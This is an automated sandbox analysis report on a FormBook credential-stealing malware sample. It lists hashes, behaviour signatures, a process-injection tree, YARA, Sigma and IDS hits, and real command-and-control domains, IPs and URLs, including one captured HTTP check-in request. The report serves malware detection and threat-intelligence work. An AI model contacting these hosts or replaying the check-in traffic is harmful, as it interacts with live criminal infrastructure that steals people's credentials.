Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1YDqrpKZwA.exe

Overview

General Information

Sample name:1YDqrpKZwA.exe
renamed because original name is a hash value
Original sample name:1d56419ab7c5d114a8df2176b6ead3254d8a785cf859dbd33ecf51bda43aea27.exe
Analysis ID:1632423
MD5:ce1ef9a34c4ff305743056e71e8a08e2
SHA1:bf0c05111ad5b4438efb0a2be4835e7492a24050
SHA256:1d56419ab7c5d114a8df2176b6ead3254d8a785cf859dbd33ecf51bda43aea27
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Xwizard DLL Sideloading
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 1YDqrpKZwA.exe (PID: 6592 cmdline: "C:\Users\user\Desktop\1YDqrpKZwA.exe" MD5: CE1EF9A34C4FF305743056E71E8A08E2)
    • svchost.exe (PID: 6780 cmdline: "C:\Users\user\Desktop\1YDqrpKZwA.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • bIMhSmtZ.exe (PID: 4168 cmdline: "C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\3G4NEprYyydS.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • xwizard.exe (PID: 5760 cmdline: "C:\Windows\SysWOW64\xwizard.exe" MD5: 8581F29C5F84B72C053DBCC5372C5DB6)
          • bIMhSmtZ.exe (PID: 5864 cmdline: "C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\UcYY5jhfXJvn.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 1948 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000009.00000002.3088675987.0000000000CB0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.3089017853.0000000003180000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.3090221719.0000000003110000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000A.00000002.3091843748.0000000005320000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.1464158922.0000000004350000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Christian Burkard (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\xwizard.exe", CommandLine: "C:\Windows\SysWOW64\xwizard.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\xwizard.exe, NewProcessName: C:\Windows\SysWOW64\xwizard.exe, OriginalFileName: C:\Windows\SysWOW64\xwizard.exe, ParentCommandLine: "C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\3G4NEprYyydS.exe" , ParentImage: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exe, ParentProcessId: 4168, ParentProcessName: bIMhSmtZ.exe, ProcessCommandLine: "C:\Windows\SysWOW64\xwizard.exe", ProcessId: 5760, ProcessName: xwizard.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\1YDqrpKZwA.exe", CommandLine: "C:\Users\user\Desktop\1YDqrpKZwA.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\1YDqrpKZwA.exe", ParentImage: C:\Users\user\Desktop\1YDqrpKZwA.exe, ParentProcessId: 6592, ParentProcessName: 1YDqrpKZwA.exe, ProcessCommandLine: "C:\Users\user\Desktop\1YDqrpKZwA.exe", ProcessId: 6780, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\1YDqrpKZwA.exe", CommandLine: "C:\Users\user\Desktop\1YDqrpKZwA.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\1YDqrpKZwA.exe", ParentImage: C:\Users\user\Desktop\1YDqrpKZwA.exe, ParentProcessId: 6592, ParentProcessName: 1YDqrpKZwA.exe, ProcessCommandLine: "C:\Users\user\Desktop\1YDqrpKZwA.exe", ProcessId: 6780, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T23:41:48.267193+010028554651A Network Trojan was detected192.168.2.649687104.21.48.180TCP
                2025-03-07T23:42:14.801179+010028554651A Network Trojan was detected192.168.2.64969346.38.243.23480TCP
                2025-03-07T23:42:27.960707+010028554651A Network Trojan was detected192.168.2.64969713.248.169.4880TCP
                2025-03-07T23:42:41.393999+010028554651A Network Trojan was detected192.168.2.649701162.0.231.20380TCP
                2025-03-07T23:42:55.297459+010028554651A Network Trojan was detected192.168.2.649705192.186.58.3180TCP
                2025-03-07T23:43:09.091604+010028554651A Network Trojan was detected192.168.2.64970913.248.169.4880TCP
                2025-03-07T23:43:22.452500+010028554651A Network Trojan was detected192.168.2.649713144.76.229.20380TCP
                2025-03-07T23:43:35.795248+010028554651A Network Trojan was detected192.168.2.649717144.76.229.20380TCP
                2025-03-07T23:43:49.903568+010028554651A Network Trojan was detected192.168.2.649721198.2.236.22180TCP
                2025-03-07T23:44:12.424475+010028554651A Network Trojan was detected192.168.2.649725208.91.197.2780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T23:41:07.105139+010028554641A Network Trojan was detected192.168.2.649726172.67.217.20980TCP
                2025-03-07T23:42:04.870234+010028554641A Network Trojan was detected192.168.2.64969046.38.243.23480TCP
                2025-03-07T23:42:07.418121+010028554641A Network Trojan was detected192.168.2.64969146.38.243.23480TCP
                2025-03-07T23:42:09.964143+010028554641A Network Trojan was detected192.168.2.64969246.38.243.23480TCP
                2025-03-07T23:42:20.308090+010028554641A Network Trojan was detected192.168.2.64969413.248.169.4880TCP
                2025-03-07T23:42:22.860795+010028554641A Network Trojan was detected192.168.2.64969513.248.169.4880TCP
                2025-03-07T23:42:25.412027+010028554641A Network Trojan was detected192.168.2.64969613.248.169.4880TCP
                2025-03-07T23:42:33.611954+010028554641A Network Trojan was detected192.168.2.649698162.0.231.20380TCP
                2025-03-07T23:42:36.163044+010028554641A Network Trojan was detected192.168.2.649699162.0.231.20380TCP
                2025-03-07T23:42:38.714475+010028554641A Network Trojan was detected192.168.2.649700162.0.231.20380TCP
                2025-03-07T23:42:47.461712+010028554641A Network Trojan was detected192.168.2.649702192.186.58.3180TCP
                2025-03-07T23:42:50.035210+010028554641A Network Trojan was detected192.168.2.649703192.186.58.3180TCP
                2025-03-07T23:42:52.633015+010028554641A Network Trojan was detected192.168.2.649704192.186.58.3180TCP
                2025-03-07T23:43:01.462433+010028554641A Network Trojan was detected192.168.2.64970613.248.169.4880TCP
                2025-03-07T23:43:03.993659+010028554641A Network Trojan was detected192.168.2.64970713.248.169.4880TCP
                2025-03-07T23:43:06.560481+010028554641A Network Trojan was detected192.168.2.64970813.248.169.4880TCP
                2025-03-07T23:43:14.834101+010028554641A Network Trojan was detected192.168.2.649710144.76.229.20380TCP
                2025-03-07T23:43:17.373260+010028554641A Network Trojan was detected192.168.2.649711144.76.229.20380TCP
                2025-03-07T23:43:19.989317+010028554641A Network Trojan was detected192.168.2.649712144.76.229.20380TCP
                2025-03-07T23:43:28.181672+010028554641A Network Trojan was detected192.168.2.649714144.76.229.20380TCP
                2025-03-07T23:43:30.711467+010028554641A Network Trojan was detected192.168.2.649715144.76.229.20380TCP
                2025-03-07T23:43:33.267232+010028554641A Network Trojan was detected192.168.2.649716144.76.229.20380TCP
                2025-03-07T23:43:42.211514+010028554641A Network Trojan was detected192.168.2.649718198.2.236.22180TCP
                2025-03-07T23:43:44.776875+010028554641A Network Trojan was detected192.168.2.649719198.2.236.22180TCP
                2025-03-07T23:43:47.305236+010028554641A Network Trojan was detected192.168.2.649720198.2.236.22180TCP
                2025-03-07T23:44:03.801523+010028554641A Network Trojan was detected192.168.2.649722208.91.197.2780TCP
                2025-03-07T23:44:06.384925+010028554641A Network Trojan was detected192.168.2.649723208.91.197.2780TCP
                2025-03-07T23:44:08.931075+010028554641A Network Trojan was detected192.168.2.649724208.91.197.2780TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 1YDqrpKZwA.exeAvira: detected
                Source: http://www.031234440.xyz/q3l4/?od=XTaIEBYIF0YkvLNh6/8KU2xBYQ1vsk5yHbu7zngjqdF2cLR7PrXZ8E+zqSqBEYTjhTY/37edNyyuWFBzFry4UpE4qKahf+DfLEY6kLSVfLRluxeHmDIsJMwkztQoc/IupEVbX14=&rD-=lDpT9JrAvira URL Cloud: Label: malware
                Source: http://www.tabs123.xyz/j46k/Avira URL Cloud: Label: malware
                Source: http://www.zltbd.top/4stx/Avira URL Cloud: Label: malware
                Source: 1YDqrpKZwA.exeVirustotal: Detection: 69%Perma Link
                Source: 1YDqrpKZwA.exeReversingLabs: Detection: 81%
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3088675987.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3089017853.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3090221719.0000000003110000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3091843748.0000000005320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1464158922.0000000004350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3089095776.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1463500650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1463772333.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 1YDqrpKZwA.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: wntdll.pdbUGP source: 1YDqrpKZwA.exe, 00000000.00000003.1243246434.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, 1YDqrpKZwA.exe, 00000000.00000003.1244863700.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1368148034.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1463815847.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1370146590.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1463815847.0000000003600000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000009.00000003.1463897442.0000000004BD0000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000009.00000003.1466273036.0000000004D8B000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090312107.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090312107.00000000050DE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 1YDqrpKZwA.exe, 00000000.00000003.1243246434.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, 1YDqrpKZwA.exe, 00000000.00000003.1244863700.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1368148034.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1463815847.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1370146590.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1463815847.0000000003600000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, xwizard.exe, 00000009.00000003.1463897442.0000000004BD0000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000009.00000003.1466273036.0000000004D8B000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090312107.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090312107.00000000050DE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: xwizard.pdb source: svchost.exe, 00000002.00000003.1432166999.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1431590021.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432310020.0000000003027000.00000004.00000020.00020000.00000000.sdmp, bIMhSmtZ.exe, 00000008.00000003.1401218035.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, bIMhSmtZ.exe, 00000008.00000002.3089405152.00000000009B1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: xwizard.exe, 00000009.00000002.3089303575.0000000003346000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.000000000556C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000000.1531793198.0000000002EEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1761265485.0000000027BFC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: xwizard.exe, 00000009.00000002.3089303575.0000000003346000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.000000000556C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000000.1531793198.0000000002EEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1761265485.0000000027BFC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: xwizard.pdbGCTL source: svchost.exe, 00000002.00000003.1432166999.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1431590021.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432310020.0000000003027000.00000004.00000020.00020000.00000000.sdmp, bIMhSmtZ.exe, 00000008.00000003.1401218035.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, bIMhSmtZ.exe, 00000008.00000002.3089405152.00000000009B1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bIMhSmtZ.exe, 00000008.00000002.3089837312.0000000000EAF000.00000002.00000001.01000000.00000005.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3089420407.0000000000EAF000.00000002.00000001.01000000.00000005.sdmp
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00694696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00694696
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0069C93C FindFirstFileW,FindClose,0_2_0069C93C
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0069C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0069C9C7
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0069F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0069F200
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0069F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0069F35D
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0069F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0069F65E
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00693A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00693A2B
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00693D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00693D4E
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0069BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0069BF27
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 9_2_00CCC580 FindFirstFileW,FindNextFileW,FindClose,9_2_00CCC580
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 4x nop then xor eax, eax9_2_00CB9EE0
                Source: C:\Windows\SysWOW64\xwizard.exeCode function: 4x nop then mov ebx, 00000004h9_2_04CD04CF

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49699 -> 162.0.231.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49707 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49691 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49710 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49711 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49693 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49697 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49701 -> 162.0.231.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49694 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49687 -> 104.21.48.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49698 -> 162.0.231.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49690 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49717 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49709 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49723 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49708 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49722 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49692 -> 46.38.243.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49706 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49712 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49695 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49713 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49705 -> 192.186.58.31:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49696 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49718 -> 198.2.236.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49700 -> 162.0.231.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49714 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49704 -> 192.186.58.31:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49725 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49719 -> 198.2.236.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49702 -> 192.186.58.31:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49724 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49716 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49715 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49721 -> 198.2.236.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49720 -> 198.2.236.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49703 -> 192.186.58.31:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49726 -> 172.67.217.209:80
                Source: DNS query: www.tabs123.xyz
                Source: DNS query: www.autonomousrich.xyz
                Source: DNS query: www.031235066.xyz
                Source: DNS query: www.031234440.xyz
                Source: DNS query: www.bitcoinescort.xyz
                Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
                Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
                Source: Joe Sandbox ViewIP Address: 144.76.229.203 144.76.229.203
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006A25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_006A25E2
                Source: global trafficHTTP traffic detected: GET /4ik7/?od=xPq5oCCbBo83v+GeuhNZRIdTK/xvBEz7KnYTXaTpKYfL7EsneUNY6BAXI1QdzJEfBj/uL7kFkbVGRfDA0vMG1DKAZVG6pXssjTchk93vpIXPs3S2BldnG+WfXJW0PZckGMIQPEQ=&rD-=lDpT9Jr HTTP/1.1Host: www.cheapwil.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 1.1.4322)
